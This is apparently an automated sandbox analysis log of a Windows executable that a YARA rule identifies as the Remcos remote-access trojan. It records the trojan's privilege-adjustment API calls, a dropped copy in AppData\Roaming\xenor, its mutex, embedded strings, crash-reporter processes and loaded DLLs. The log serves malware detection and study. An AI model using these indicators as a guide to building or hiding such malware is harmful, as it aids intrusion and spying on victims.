            Source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: yPIOW6yoPi.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: yavascript.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@20/64@1/2
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 0_2_00416AB7
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_02106D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 0_2_02106D1E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 17_2_00416AB7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_00766D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 17_2_00766D1E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 20_2_00416AB7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_02146D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 20_2_02146D1E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 38_2_00416AB7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_02196D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 38_2_02196D1E
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, | 0_2_0040E219
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource, | 0_2_0041A63F
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, | 0_2_00419BC4
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | File created: C:\Users\user\AppData\Roaming\xenor
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-I7G983
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4196
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1512
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1612
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\8da1b0b3-9424-48ef-a006-c45180a8616a
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: Software\ | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: Rmc-I7G983 | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: Exe | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: Exe | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: Rmc-I7G983 | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: 0DG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: Inj | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: Inj | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: BG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: BG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: BG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: @CG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: BG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: exepath | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: @CG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: exepath | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: BG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: licence | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: `=G | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Command line argument: XCG | 0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: dCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: Administrator0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: User0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: del0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: del0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: del0_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Software\ | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Rmc-I7G983 | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Exe | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Exe | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Rmc-I7G983 | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: 0DG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Inj | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Inj | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: @CG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: exepath | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: @CG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: exepath | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: licence | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: `=G | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: dCG | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Administrator | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: User | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: del | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: del | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: del | 17_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: %cz | 17_2_007A6277
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Software\ | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: (CG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Exe | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: (CG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: 0DG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Inj | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Inj | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: @CG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: exepath | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: @CG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: exepath | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: licence | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: `=G | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: dCG | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Administrator | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: User | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: del | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: del | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: del | 20_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Software\ | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: (CG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Exe | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: (CG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: 0DG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Inj | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Inj | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: @CG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: exepath | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: @CG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: exepath | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: BG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: licence | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: `=G | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: XCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: dCG | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: Administrator | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: User | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: del | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: del | 38_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Command line argument: del | 38_2_0040D767
Source: yPIOW6yoPi.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: yPIOW6yoPi.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | File read: C:\Users\user\Desktop\yPIOW6yoPi.exe
Source: unknown | Process created: C:\Users\user\Desktop\yPIOW6yoPi.exe "C:\Users\user\Desktop\yPIOW6yoPi.exe"
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1000
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1008
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1112
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1120
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1116
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1120
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1044
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1300
Source: unknown | Process created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 708
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 472
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 716
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 744
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 708
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 752
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 920
Source: unknown | Process created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: kernel.appcore.dll
